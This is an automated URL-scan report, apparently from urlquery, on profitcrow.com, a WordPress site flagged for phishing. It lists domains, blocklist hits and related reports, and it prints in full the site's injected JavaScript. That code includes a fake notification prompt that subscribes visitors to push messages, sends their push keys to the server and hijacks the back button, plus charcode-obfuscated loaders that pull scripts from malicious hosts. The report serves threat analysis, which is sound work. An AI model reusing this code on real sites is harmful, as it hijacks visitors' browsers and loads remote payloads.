Overview

URL profitcrow.com/
IP 162.213.255.22 (United States)
ASN #22612 NAMECHEAP-NET
UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed 2022-11-25 22:08:13 UTC
IDS alerts 0
Blocklist alert 31
urlquery alerts No alerts detected
Tags None

Domain Summary (28)

Fully Qualified Domain Name Rank First Seen Last Seen IP Comment
ocsp.digicert.com (3) 86 No data No data 93.184.220.29
push.services.mozilla.com (1) 2140 No data No data 54.202.70.174
firefox.settings.services.mozilla.com (2) 867 No data No data 34.102.187.140
img-getpocket.cdn.mozilla.net (6) 1631 No data No data 34.120.237.76
freeserv.dukascopy.com (5) 794995 No data No data 194.8.15.120
code.jquery.com (1) 634 No data No data 69.16.175.42
ocsp.sca1b.amazontrust.com (1) 1015 No data No data 143.204.42.156
blueskymotions.net (1) 0 No data No data 185.177.94.108 Unknown ranking
api.stockdio.com (1) 324796 No data No data 34.232.23.18
new.weatherplllatform.com (1) 0 No data No data 91.211.91.114 Unknown ranking
r3.o.lencr.org (10) 344 No data No data 23.36.76.249
contile.services.mozilla.com (1) 1114 No data No data 34.117.237.239
simple.cofounderspecials.com (1) 0 No data No data 91.211.91.114 Unknown ranking
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
ocsp.sectigo.com (1) 487 No data No data 104.18.32.68
fonts.gstatic.com (1) 0 No data No data 216.58.207.195 Domain (gstatic.com) ranked at: 540
dn9.biz (3) 0 No data No data 195.154.50.108 Unknown ranking
dn9.biz (3) 0 No data No data 62.210.10.215 Unknown ranking
profitcrow.com (61) 0 No data No data 162.213.255.22 Unknown ranking
scripts.bettershitecolumn.com (1) 0 No data No data 91.211.91.104 Unknown ranking
ocsp.pki.goog (3) 175 No data No data 142.250.74.3
away.cdnbestplatform.com (1) 0 No data No data 91.211.91.104 Unknown ranking
freeserv-static.dukascopy.com (4) 0 No data No data 104.22.7.183 Domain (dukascopy.com) ranked at: 261069
cdnjs.cloudflare.com (4) 235 No data No data 104.17.25.14
fonts.googleapis.com (1) 8877 No data No data 142.250.74.10
trick.cofounderspecials.com (2) 0 No data No data 91.211.91.112 Unknown ranking
zerossl.ocsp.sectigo.com (3) 4049 No data No data 104.18.32.68
0.blueskymotions.net (2) 0 No data No data 185.177.94.108 Unknown ranking

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-25 2 profitcrow.com/ Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/jquery.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/jquery-migrate.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/video-popup/js/YouTubePopUp.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stock-market-ticker/assets/stockdio-wp.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stockdio-historical-chart/assets/stockdio (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/profitcrow/pagination.js Phishing
2022-11-25 2 trick.cofounderspecials.com/track.js?v=9.999 Malware
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/wp-mediaelement.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/dist/vendor/wp-polyfill.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/contact-form-7/includes/js/index.js Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/stripe-payments/public/assets/js/stripe-h (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/renderers/vimeo.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/jquery/ui/core.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/frontend.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/header-footer-elementor/inc/js/frontend.js Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints. (...) Phishing
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js Phishing
2022-11-25 2 profitcrow.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js Phishing
2022-11-25 2 trick.cofounderspecials.com/track.js?v=9.999 Malware
2022-11-25 2 away.cdnbestplatform.com/go.php?id=9677-22-5680954-11 Malware
2022-11-25 2 profitcrow.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfont (...) Phishing
2022-11-25 2 scripts.bettershitecolumn.com/sort.js?v=100 Malware
2022-11-25 2 new.weatherplllatform.com/stick.js?v=7.77.7 Malware
2022-11-25 2 profitcrow.com/ Phishing

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 162.213.255.22
Date UQ / IDS / BL URL IP
2023-01-04 11:04:21 +0000 0 - 0 - 2 alliedfelicity.com/business-banking-notice-de (...) 162.213.255.22
2023-01-04 11:03:33 +0000 0 - 0 - 2 alliedfelicity.com/account.zip 162.213.255.22
2023-01-01 06:31:57 +0000 0 - 0 - 2 alliedfelicity.com/business-banking-notice-de (...) 162.213.255.22
2023-01-01 06:31:18 +0000 0 - 0 - 2 alliedfelicity.com/account.zip 162.213.255.22
2022-11-25 22:08:13 +0000 0 - 0 - 31 profitcrow.com/ 162.213.255.22


Last 5 reports on ASN: NAMECHEAP-NET
Date UQ / IDS / BL URL IP
2023-01-28 10:53:02 +0000 0 - 0 - 4 cienciano.com/race.exe 162.213.255.18
2023-01-28 10:48:04 +0000 0 - 0 - 8 expertstraders.com/installlingfile_x64_32bit.zip 192.64.117.220
2023-01-28 10:40:59 +0000 0 - 0 - 1 houzzing.com/Secure.00/Inn/loginweb.php?sslmo (...) 198.54.114.248
2023-01-28 10:24:19 +0000 0 - 0 - 2 delivery.bdsellprice.com/public/VlScjR5UDOwG6 (...) 68.65.120.179
2023-01-28 10:14:17 +0000 0 - 0 - 2 delivery.bdsellprice.com/public/XoWY6Q5B8nAMz (...) 68.65.120.179


Last 1 reports on domain: profitcrow.com
Date UQ / IDS / BL URL IP
2022-11-25 22:08:13 +0000 0 - 0 - 31 profitcrow.com/ 162.213.255.22


Last 5 reports with similar screenshot
Date UQ / IDS / BL URL IP
2023-01-28 10:13:38 +0000 0 - 0 - 3 denimfocus.net/mailster/7644/d7d717e54cd323c1 (...) 68.65.120.78
2023-01-28 10:06:59 +0000 0 - 0 - 3 primaflor-sby.com/wp-content/ngg/modules/phot (...) 103.5.51.228
2023-01-28 09:24:42 +0000 0 - 2 - 10 ufj-ja.post778.top/jp.php 155.94.170.149
2023-01-28 08:33:33 +0000 0 - 0 - 4 pablobreijo.es/agenzia/e912/by3g6c.php 172.67.209.149
2023-01-28 07:25:11 +0000 0 - 2 - 2 194.190.153.137/gate.php?hwid=Q9IATRKPRH-kEec (...) 194.190.153.137

JavaScript

Executed Scripts (57)

Executed Evals (7)
#1 JavaScript::Eval (size: 7852) - SHA256: 01805edf950265b74eea23c1f16caf3adcb9debd694228f9a8131c373e3130b4
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.blueskymotions.net/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed17'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=ede59595-4aac-48f8-ba4c-16b1da54c3a0&d=meygky3cmm5gi3bpg42tmmy&land=23',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='/?auf=gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/w76899721.js').then(()=>{if(Notification.permission==='granted'){window.location.href='/?auf=gztdcy3fha5diojygyxtonjwgmxtemzpge3dmojuge2daobx&s=1&sub1=&sub2=dfastspeed17&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#2 JavaScript::Eval (size: 727) - SHA256: faca0b8a53bf2af83db28e2885d8c067ac3ae1e6d24d8c68f90b81aa21acaa84
var scripts = document.getElementsByTagName("script");
var wantme = false;
for (var i = 0; i < scripts.length; i++) {
    if (scripts[i].id) {
        if (scripts[i].id == "trackmyposs") {
            wantme = true;
        }
    }
}
if (wantme == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "trackmyposs";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 99, 114, 105, 112, 116, 115, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 111, 114, 116, 46, 106, 115, 63, 118, 61, 49, 48, 48);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#3 JavaScript::Eval (size: 7918) - SHA256: 1ca29c4edebdadf8fdce0eb1318ac0194c97aa21f34fdefbe8c5e64f8bb3864a
'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64," / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('/ ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace(' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('
            BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG - xOq6GiK31R - NF--qzgT3_C2jurmRX_N6nY4g ');var denied=function(){window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('
            p256dh '):'
            ';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'
            ';let rawAuthSecret=fff.getKey?fff.getKey('
            auth '):'
            ';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'
            ';return fetch(' / ? send = ede59595 - 4 aac - 48 f8 - ba4c - 16 b1da54c3a0 & d = meygky3cmm5gi3bpg42tmmy & land = 22 ',{method:'
            POST ',mode:'
            no - cors ',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='
            granted '){CCC()}else{denied()}})};if('
            serviceWorker 'in navigator){workerInstaller=navigator.serviceWorker.register(' / w76899721.js ').then(()=>{if(Notification.permission==='
            granted '){window.location.href=' / ? auf = mzstkzrrgq5diojygyxtonjwgmxtemrpge3dmojuge2daobx & s = 1 & sub1 = & sub2 = dfastspeed17 & sub3 = & sub4 = & cpc = 0 & cpm = 0 '}else if(Notification.permission!=='
            denied '){canStart=true;if(!isChrome){SSS()}}else{denied()}})}
#4 JavaScript::Eval (size: 663) - SHA256: dc6acc70fa6a127bcde95478f41fc3ec8b472cc6327b69d1fd5c5e3633a96540
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        if (psdd[i].id == "slectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "slectrepoint";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 110, 101, 119, 46, 119, 101, 97, 116, 104, 101, 114, 112, 108, 108, 108, 97, 116, 102, 111, 114, 109, 46, 99, 111, 109, 47, 115, 116, 105, 99, 107, 46, 106, 115, 63, 118, 61, 55, 46, 55, 55, 46, 55);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#5 JavaScript::Eval (size: 655) - SHA256: 8532e915d2cfe6d3a9804fa0b3a9eff8e366c2bed9011fbae4eee332ce7a6248
var psdd = document.getElementsByTagName("script");
var wantmee = false;
for (var i = 0; i < psdd.length; i++) {
    if (psdd[i].id) {
        if (psdd[i].id == "spectrepoint") {
            wantmee = true;
        }
    }
}
if (wantmee == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "spectrepoint";
    s.async = true;
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 97, 100, 46, 98, 101, 116, 116, 101, 114, 115, 104, 105, 116, 101, 99, 111, 108, 117, 109, 110, 46, 99, 111, 109, 47, 115, 106, 108, 97, 115, 104, 46, 106, 115);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#6 JavaScript::Eval (size: 671) - SHA256: 1a14a530a69e438860a722d1793b14ea7d69787812b59c5439da766c853fb72c
var scripts = document.getElementsByTagName("script");
var wantme = false;
for (var i = 0; i < scripts.length; i++) {
    if (scripts[i].id) {
        if (scripts[i].id == "trackmyposs") {
            wantme = true;
        }
    }
}
if (wantme == false) {
    var d = document;
    var s = d.createElement('script');
    s.id = "trackmyposs";
    s.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 116, 114, 105, 99, 107, 46, 99, 111, 102, 111, 117, 110, 100, 101, 114, 115, 112, 101, 99, 105, 97, 108, 115, 46, 99, 111, 109, 47, 116, 114, 97, 99, 107, 46, 106, 115, 63, 118, 61, 53, 46, 53, 53, 53);
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName('head')[0].appendChild(s);
    }
}
#7 JavaScript::Eval (size: 676) - SHA256: df26ce4b1aa046d6fa0b9ad50c4f12cadb2c7c421b876a273cbd6a126d851222
